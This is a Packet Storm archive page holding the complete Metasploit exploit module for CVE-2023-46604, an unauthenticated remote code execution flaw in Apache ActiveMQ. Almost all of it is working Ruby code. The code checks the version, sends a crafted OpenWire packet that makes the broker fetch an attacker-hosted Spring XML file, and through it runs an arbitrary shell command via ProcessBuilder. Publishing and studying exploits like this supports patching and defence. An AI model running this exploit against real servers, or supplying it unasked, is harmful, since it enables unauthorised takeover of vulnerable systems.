exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache ActiveMQ Unauthenticated Remote Code Execution

Apache ActiveMQ Unauthenticated Remote Code Execution
Posted Nov 14, 2023
Authored by sfewer-r7, X1r0z | Site metasploit.com

This Metasploit module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16.

tags | exploit
advisories | CVE-2023-46604
SHA-256 | d62b07b49999cf639cee2c97c21a92b797b2c59f3353f6f4b3a0a040950ac02e

Apache ActiveMQ Unauthenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Retry

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache
ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to
5.16.6, and all versions before 5.15.16.
},
'License' => MSF_LICENSE,
'Author' => [
'X1r0z', # Original technical analysis & exploit
'sfewer-r7', # MSF exploit & Rapid7 analysis
],
'References' => [
['CVE', '2023-46604'],
['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],
['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],
['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],
['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']
],
'DisclosureDate' => '2023-10-27',
'Privileged' => false,
'Platform' => %w[win linux unix],
'Arch' => [ARCH_CMD],
# The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the
# Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will
# be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.
'Stance' => Stance::Aggressive,
'Targets' => [
[
'Windows',
{
'Platform' => 'win'
}
],
[
'Linux',
{
'Platform' => 'linux'
}
],
[
'Unix',
{
'Platform' => 'unix'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
# By default ActiveMQ listens for OpenWire requests on TCP port 61616.
'RPORT' => 61616,
# The maximum time in seconds to wait for a session.
'WfsDelay' => 30
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
end

def check
connect

res = sock.get_once

disconnect

return CheckCode::Unknown unless res

len, _, magic = res.unpack('NCZ*')

return CheckCode::Unknown unless res.length == len + 4

return CheckCode::Unknown unless magic == 'ActiveMQ'

return CheckCode::Detected unless res =~ /ProviderVersion...(\d+\.\d+\.\d+)/

version = Rex::Version.new(::Regexp.last_match(1))

ranges = [
['5.18.0', '5.18.2'],
['5.17.0', '5.17.5'],
['5.16.0', '5.16.6'],
['0.0.0', '5.15.15']
]

ranges.each do |min, max|
if version.between?(Rex::Version.new(min), Rex::Version.new(max))
return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
end
end

Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
end

def exploit
# The payload is send in a CDATA section of an XML file. Therefore, the payload cannot contain a CDATA closing tag.
if payload.encoded.include? ']]>'
fail_with(Failure::BadConfig, 'The encoded payload data may not contain the CDATA closing tag ]]>')
end

start_service

connect

# The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To
# leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we
# serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to
# run an attacker supplied command line via java.lang.ProcessBuilder.start.
clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'

# 31 is the EXCEPTION_RESPONSE data type.
data = [31].pack('C')
# ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.
data << [0].pack('N')
# and a 1 byte boolean for response required.
data << [0].pack('C')
# ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.
data << [0].pack('N')
# BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.
data << [1].pack('C')
# BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.
data << [1].pack('C')
# First 2 bytes are the length.
data << [clazz.length].pack('n')
# Then the string data. This is the class name to instantiate.
data << clazz
# Same again for the method string. This is the single string parameter used during class instantiation.
data << [1].pack('C')
data << [get_uri.length].pack('n')
data << get_uri

sock.puts([data.length].pack('N') + data)

retry_until_truthy(timeout: datastore['WfsDelay']) do
!handler_enabled? || session_created?
end

handler
ensure
cleanup
end

def on_request_uri(cli, request)
if request.uri != get_resource
super
end

case target['Platform']
when 'win'
shell = 'cmd.exe'
flag = '/c'
when 'linux', 'unix'
shell = '/bin/sh'
flag = '-c'
end

xml = %(<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>#{shell}</value>
<value>#{flag}</value>
<value><![CDATA[#{payload.encoded}]]></value>
</list>
</constructor-arg>
</bean>
</beans>)

send_response(cli, xml, {
'Content-Type' => 'application/xml',
'Connection' => 'close',
'Pragma' => 'no-cache'
})

print_status('Sent ClassPathXmlApplicationContext configuration file.')
end

end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close